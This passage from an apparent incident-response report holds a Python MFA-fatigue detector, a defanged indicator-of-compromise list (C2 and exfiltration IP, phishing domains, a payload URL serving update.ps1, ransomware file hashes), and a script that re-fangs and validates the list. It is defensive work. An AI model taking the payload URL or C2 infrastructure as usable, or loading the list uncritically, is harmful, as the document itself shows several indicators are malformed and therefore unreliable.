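    json.dumps({"time": "2026-05-27T14:12:40Z", "category": "SignInLogs",
                "userPrincipalName": "t.nguyen@ficsit-pioneer.corp", "ipAddress": "10.0.1.77",
                "appDisplayName": "Outlook", "status": {"errorCode": 0}, "succeeded": True}),
]


def parse_signins(lines):
    """Reduce SignInLogs JSON lines to the fields the detector needs, oldest first."""
    events = []
    for line in lines:
        r = json.loads(line)
        events.append({
            "time": datetime.strptime(r["time"], "%Y-%m-%dT%H:%M:%SZ"),
            "upn": r["userPrincipalName"],
            "ip": r["ipAddress"],
            "app": r.get("appDisplayName", ""),
            "code": str(r["status"]["errorCode"]),
        })
    return sorted(events, key=lambda e: e["time"])


def detect_mfa_burst(events, threshold=5, window=timedelta(minutes=10)):
    """One finding per success preceded by >= threshold MFA failures within `window`."""
    findings = []
    by_user = {}
    for e in events:
        by_user.setdefault(e["upn"], []).append(e)
    for upn, evs in by_user.items():
        for i, e in enumerate(evs):
            if e["code"] != "0":            # only successes can close a burst
                continue
            failed = [p for p in evs[:i]
                      if p["code"] == MFA_FAILED and e["time"] - p["time"] <= window]
            if len(failed) < threshold:
                continue
            findings.append({
                "upn": upn,
                "success_time": e["time"],
                "ip": e["ip"],
                "app": e["app"],
                "failed_count": len(failed),
                "burst_seconds": int((e["time"] - failed[0]["time"]).total_seconds()),
                # Pushes and success from one IP: one actor replaying one valid password.
                "single_source": {p["ip"] for p in failed} == {e["ip"]},
            })
    return findings


if __name__ == "__main__":
    for f in detect_mfa_burst(parse_signins(SIGNIN_LOG)):
        print(f"{f['upn']}: {f['failed_count']} failed pushes over {f['burst_seconds']}s, "
              f"then success from {f['ip']} to {f['app']}")
```

On the sample the detector returns a single finding for m.blake (seven failures in 451 seconds, all from 203.0.113.88) and nothing for the benign user; the finding is the point at which PB-002's suspend, revoke and token-reset steps should run, rather than waiting for an analyst to read ALT-7285.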
Appendix B
IOC Reference — Machine-Readable Format

All IOCs below are defanged for safe sharing. Remove defanging (replace [.] with . and hxxp with http) before operationalizing.

IOC List — IRON CHIMNEY (TA-001 / Operation SMELTING)
TLP:AMBER
# IP Addresses
185[.]220[.]101[.]47          # C2 / AiTM proxy / exfil destination (Confirmed)
203[.]0[.]113[.]88            # MFA fatigue source (Confirmed)
92[.]118[.]37[.]91            # After-hours VPN login source (Medium)

# Domains
pioneer-updates[.]svc[.]net
update-cdn[.]ficsit-external[.]com
ficsit-account-verify[.]com
d3adbeef123456789[.]update[.]microsoft-cdn-verify[.]net

# URLs
hxxps://pioneer-updates[.]svc[.]net/portal/verify
hxxp://update-cdn[.]ficsit-external[.]com/mam/latest/update.ps1

# File Hashes (SHA256)
a3f8d4c2e1b9f0741d6c3a8b5e7f2d09c4b1e3a8f6d2c7b0e5a4f1d8c3b9e7  # pioneer_research_tool.exe (IRONLOCK)
b9c2e7f4a1d3e031c8f5a4b7e2d9c1f6a3b8e5d2c7f4a1b0e3d8c5f2a9b6e1  # README_DECRYPT.txt dropper
a3f8c1d2e4b5a9f0c7e3d6b8a1f4c2e5d9b3a7f0c4e8d1b5a2f6c3e7d0b4a8  # MAM_Update_Q4_2026.xlsm

# Email Addresses
updates@pioneer-updates[.]svc[.]net
external@threatactor[.]net

# Scheduled Task
\Microsoft\Windows\Update\Updater  (malicious persistence — not legitimate Windows task)
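As an added example, not Ficsit tooling, the Python below re-fangs the list above and checks each indicator's shape before it is loaded into any control, because a malformed value silently loaded into a blocklist is a gap rather than a detection. Two results from the list itself are worth recording. The three values given under SHA256 are 62 hexadecimal characters long, so they cannot equal a SHA-256 digest (64 characters) and will never match; they should be re-pulled from the EDR or the forensic image before use. And 203.0.113.88 lies in 203.0.113.0/24, reserved by RFC 5737 for documentation and not routable on the public Internet, so the true MFA-fatigue source should be confirmed from the sign-in logs before it is blocklisted. The indicator type names and notes the code returns are this example's own conventions.

```python
"""Refang and sanity-check the Appendix B IOC list before loading it anywhere.

Added example for this report (not Ficsit tooling). Reverses the [.] / hxxp
defanging and validates each indicator's shape, flagging values that can never
match (wrong hash length) or never route (documentation address space).
"""
import ipaddress
import re

# Appendix B as printed above.
IOC_TEXT = r"""
# IP Addresses
185[.]220[.]101[.]47          # C2 / AiTM proxy / exfil destination (Confirmed)
203[.]0[.]113[.]88            # MFA fatigue source (Confirmed)
92[.]118[.]37[.]91            # After-hours VPN login source (Medium)

# Domains
pioneer-updates[.]svc[.]net
update-cdn[.]ficsit-external[.]com
ficsit-account-verify[.]com
d3adbeef123456789[.]update[.]microsoft-cdn-verify[.]net

# URLs
hxxps://pioneer-updates[.]svc[.]net/portal/verify
hxxp://update-cdn[.]ficsit-external[.]com/mam/latest/update.ps1

# File Hashes (SHA256)
a3f8d4c2e1b9f0741d6c3a8b5e7f2d09c4b1e3a8f6d2c7b0e5a4f1d8c3b9e7  # pioneer_research_tool.exe (IRONLOCK)
b9c2e7f4a1d3e031c8f5a4b7e2d9c1f6a3b8e5d2c7f4a1b0e3d8c5f2a9b6e1  # README_DECRYPT.txt dropper
a3f8c1d2e4b5a9f0c7e3d6b8a1f4c2e5d9b3a7f0c4e8d1b5a2f6c3e7d0b4a8  # MAM_Update_Q4_2026.xlsm

# Email Addresses
updates@pioneer-updates[.]svc[.]net
external@threatactor[.]net

# Scheduled Task
\Microsoft\Windows\Update\Updater  (malicious persistence — not legitimate Windows task)
"""

SECTION_TYPES = {"IP Addresses": "ipv4", "Domains": "domain", "URLs": "url",
                 "File Hashes (SHA256)": "sha256", "Email Addresses": "email",
                 "Scheduled Task": "scheduled_task"}
# RFC 5737 documentation ranges: never routed, so a block rule on them is a no-op.
DOC_NETS = [ipaddress.ip_network(n) for n in ("192.0.2.0/24", "198.51.100.0/24", "203.0.113.0/24")]
DOMAIN_RE = re.compile(r"^([a-z0-9-]{1,63}\.)+[a-z]{2,63}$", re.I)


def refang(value):
    return value.replace("[.]", ".").replace("hxxp", "http")


def validate(kind, value):
    """Return (ok, note) for one refanged indicator."""
    if kind == "ipv4":
        try:
            ip = ipaddress.ip_address(value)
        except ValueError:
            return False, "not an IP address"
        if any(ip in net for net in DOC_NETS):
            return False, "RFC 5737 documentation range, not routable; confirm the real source IP"
        ok = ip.version == 4 and ip.is_global
        return ok, "" if ok else "not a global IPv4 address"
    if kind == "domain":
        ok = DOMAIN_RE.match(value) is not None
        return ok, "" if ok else "not a valid hostname"
    if kind == "url":
        parts = value.split("/")
        ok = (value.startswith(("http://", "https://")) and len(parts) > 2
              and DOMAIN_RE.match(parts[2]) is not None)
        return ok, "" if ok else "not an http(s) URL"
    if kind == "sha256":
        ok = re.fullmatch(r"[0-9a-f]{64}", value) is not None
        return ok, "" if ok else f"{len(value)} chars; SHA-256 is 64 hex chars, so this will never match"
    if kind == "email":
        local, _, dom = value.rpartition("@")
        ok = bool(local) and DOMAIN_RE.match(dom) is not None
        return ok, "" if ok else "not an email address"
    if kind == "scheduled_task":
        ok = value.startswith("\\")
        return ok, "" if ok else "expected a task path"
    return False, f"unknown indicator type {kind!r}"


def load_iocs(text):
    """Parse the defanged list into records {type, value, comment, ok, note}."""
    records, kind = [], None
    for raw in text.strip().splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):                      # section header selects the type
            kind = SECTION_TYPES.get(line.lstrip("# ").strip())
            continue
        token, _, rest = line.partition(" ")          # value, then optional "# comment"
        value = refang(token)
        ok, note = validate(kind, value)
        records.append({"type": kind, "value": value, "ok": ok, "note": note,
                        "comment": rest.strip().lstrip("#").strip()})
    return records


def problems(records):
    return [f"{r['type']} {r['value']}: {r['note']}" for r in records if not r["ok"]]


if __name__ == "__main__":
    recs = load_iocs(IOC_TEXT)
    print(f"{len(recs)} indicators, {sum(r['ok'] for r in recs)} loadable")
    for p in problems(recs):
        print("REJECT", p)
```

Only the records with `ok` set should be pushed to the gateway, DNS and NGFW; the four rejected ones (the three hashes and 203.0.113.88) go back to the analyst for correction rather than into a feed where they would sit unmatched.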